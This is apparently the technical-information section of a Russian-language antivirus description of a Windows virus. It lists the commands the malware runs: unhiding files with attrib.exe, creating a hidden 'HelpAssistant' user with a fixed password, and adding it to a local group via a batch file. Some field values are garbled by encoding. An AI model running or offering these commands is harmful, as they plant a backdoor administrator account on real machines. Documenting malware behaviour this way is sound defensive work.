Техническая информация
- '<SYSTEM32>\attrib.exe' <Текущая директория>\desktop.ini -H -S
- '<SYSTEM32>\attrib.exe' <Текущая директория>\Folder.htt -H -S
- '<SYSTEM32>\attrib.exe' <Полный путь к вирусу> -H -S
- '<SYSTEM32>\net1.exe' localgroup %USERNAME%s HelpAssistant /add
- '<SYSTEM32>\cmd.exe' /c <Текущая директория>\addAdm.bat
- '<SYSTEM32>\net1.exe' user HelpAssistant /del
- '<SYSTEM32>\net1.exe' user HelpAssistant pgxun /add /fullname:"╧╡═│░я╓·╬─╡╡" /comment:"╙├╙┌╠с╣й░я╓·╡─╒╩╗з"
- <Текущая директория>\addAdm.bat
- ClassName: 'MS_WINHELP' WindowName: ''